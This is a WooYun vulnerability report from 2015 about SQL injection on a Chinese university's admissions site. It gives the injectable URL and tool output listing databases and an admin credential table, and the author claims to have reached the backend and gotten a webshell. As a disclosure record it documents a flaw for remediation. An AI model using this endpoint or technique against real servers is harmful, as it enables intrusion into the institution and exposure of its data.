漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0109785
漏洞标题:西南民族大学招生信息网SQL一枚(已经getshell)
相关厂商:西南民族大学
漏洞作者: 泪雨无魂
提交时间:2015-04-29 20:26
修复时间:2015-05-04 20:28
公开时间:2015-05-04 20:28
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:14
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-29: 细节已通知厂商并且等待厂商处理中
2015-05-04: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
西南民族大学招生信息网 网站存在高危SQL注入漏洞,经检测是SA权限,通过SQL注入漏洞,能够爆出多个数据库,管理员账号和密码也可以爆出,已经通过管理员账号和密码进入后台,并且getshell。。。。。。。。。
泄露了该大学招生信息网的大量重要信息。。。。。。。。。。。。。
详细说明:
西南民族大学招生信息网 网站存在高危SQL注入漏洞,经检测是SA权限,通过SQL注入漏洞,能够爆出多个数据库,管理员账号和密码也可以爆出,已经通过管理员账号和密码进入后台,并且getshell。。。。。。。。。
泄露了该大学招生信息网的大量重要信息。。。。。。。。。。。。。
大学的网站我也是点到为止。。。。。。。。。你懂的啦啦啦啦。。。。
注入点之一:http://222.210.17.165:80/selects.asp?Key=88888
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [8]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] web
[*] zsweb
current user: 'sa'
current database: 'zsweb'
+---------------+---------------+
| Column | Type |
+---------------+---------------+
| AddTime | smalldatetime |
| ID | int |
| LastLoginIP | varchar |
| LastLoginTime | smalldatetime |
| UserLoginName | varchar |
| UserLoginPWD | varchar |
| UserRealName | varchar |
+---------------+---------------+
Database: zsweb
Table: KS_AdminX
[2 entries]
管理账号密码就不贴出来了
看图吧 。。。。。。。
漏洞证明:
注入点之一:http://222.210.17.165:80/selects.asp?Key=88888
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [8]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] web
[*] zsweb
current user: 'sa'
current database: 'zsweb'
+---------------+---------------+
| Column | Type |
+---------------+---------------+
| AddTime | smalldatetime |
| ID | int |
| LastLoginIP | varchar |
| LastLoginTime | smalldatetime |
| UserLoginName | varchar |
| UserLoginPWD | varchar |
| UserRealName | varchar |
+---------------+---------------+
Database: zsweb
Table: KS_AdminX
[2 entries]
我是白帽子,不搞破坏哈哈哈哈哈哈!!!!!!
就这样吧,之前提交过大学网站的漏洞,不过被忽略了 这个是招生网 应该不会吧 你懂的 啊哈哈哈哈哈
修复方案:
你懂的
版权声明:转载请注明来源 泪雨无魂@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-05-04 20:28
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无